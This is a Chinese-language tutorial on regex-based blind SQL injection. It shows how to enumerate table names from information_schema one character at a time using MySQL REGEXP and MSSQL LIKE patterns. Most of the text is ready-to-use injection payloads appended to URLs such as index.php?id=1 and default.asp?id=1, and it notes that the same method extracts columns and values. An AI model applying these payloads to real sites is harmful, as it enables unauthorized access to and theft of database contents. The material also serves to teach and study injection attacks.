SQL盲注之正則攻擊

咱們都已經知道，在MYSQL 5+中 information_schema庫中存儲了全部的 庫名，代表以及字段名信息。故攻擊方式以下：

1. 判斷第一個表名的第一個字符是不是a-z中的字符,其中blind_sqli是假設已知的庫名。

注：正則表達式中 ^[a-z] 表示字符串中開始字符是在 a-z範圍內

index.php?id=1 and 1=(SELECT 1 FROM information_schema.tables WHERE TABLE_SCHEMA="blind_sqli" AND table_name REGEXP '^[a-z]' LIMIT 0,1) /*

2. 判斷第一個字符是不是a-n中的字符

index.php?id=1 and 1=(SELECT 1 FROM information_schema.tables WHERE TABLE_SCHEMA="blind_sqli" AND table_name REGEXP '^[a-n]' LIMIT 0,1)/*

3. 肯定該字符爲n

index.php?id=1 and 1=(SELECT 1 FROM information_schema.tables WHERE TABLE_SCHEMA="blind_sqli" AND table_name REGEXP '^n' LIMIT 0,1) /*

4. 表達式的更換以下

expression like this: '^n[a-z]' -> '^ne[a-z]' -> '^new[a-z]' -> '^news[a-z]' -> FALSE

這時說明表名爲news ，要驗證是不是該代表 正則表達式爲'^news$'，可是沒這必要 直接判斷 table_name = ’news‘ 不就好了。

5.接下來猜解其它表了 （只須要修改 limit 1,1 -> limit 2,1就能夠對接下來的表進行盲注了）這裏是錯誤的！！！

regexp匹配的時候會在全部的項都進行匹配。例如：

security數據庫的表有多個，users，email等

select * from users where id=1 and 1=(select 1 from information_schema.tables where table_schema='security' and table_name regexp '^u[a-z]' limit 0,1);是正確的

select * from users where id=1 and 1=(select 1 from information_schema.tables where table_schema='security' and table_name regexp '^us[a-z]' limit 0,1);是正確的

select * from users where id=1 and 1=(select 1 from information_schema.tables where table_schema='security' and table_name regexp '^em[a-z]' limit 0,1);是正確的

select * from users where id=1 and 1=(select 1 from information_schema.tables where table_schema='security' and table_name regexp '^us[a-z]' limit 1,1);不正確

select * from users where id=1 and 1=(select 1 from information_schema.tables where table_schema='security' and table_name regexp '^em[a-z]' limit 1,1);不正確

實驗代表：在limit 0,1下，regexp會匹配全部的項。咱們在使用regexp時，要注意有可能有多個項，同時要一個個字符去爆破。相似於上述第一條和第二條。而此時limit 0,1此時是對於where table_schema='security' limit 0,1。table_schema='security'已經起到了限定做用了，limit有沒有已經不重要了。

 

-----------------------------------------------MSSQL---------------------------------------------------

MSSQL所用的正則表達式並非標準正則表達式 ，該表達式使用 like關鍵詞

default.asp?id=1 AND 1=(SELECT TOP 1 1 FROM information_schema.tables WHERE TABLE_SCHEMA="blind_sqli" and table_name LIKE '[a-z]%' )

該查詢語句中，select top 1 是一個組合哦，不要看錯了。

若是要查詢其它的表名，因爲不能像mysql哪樣用limit x,1，只能使用 table_name not in (select top x table_name from information_schema.tables) 意義是：表名沒有在前x行裏，其實查詢的就是第x+1行。

例如 查詢第二行的表名：

default.asp?id=1 AND 1=(SELECT TOP 1 1 FROM information_schema.tables WHERE TABLE_SCHEMA="blind_sqli" and table_name NOT IN ( SELECT TOP 1 table_name FROM information_schema.tables) and table_name LIKE '[a-z]%' )

表達式的順序：

'n[a-z]%' -> 'ne[a-z]%' -> 'new[a-z]%' -> 'news[a-z]%' -> TRUE

之因此表達式 news[a-z]查詢後返回正確是應爲%表明0-n個字符，使用"_"則只能表明一個字符。故確認後續是否還有字符克用以下表達式

'news%' TRUE -> 'news_' FALSE

同理能夠用相同的方法獲取字段，值。這裏就再也不詳細描述了。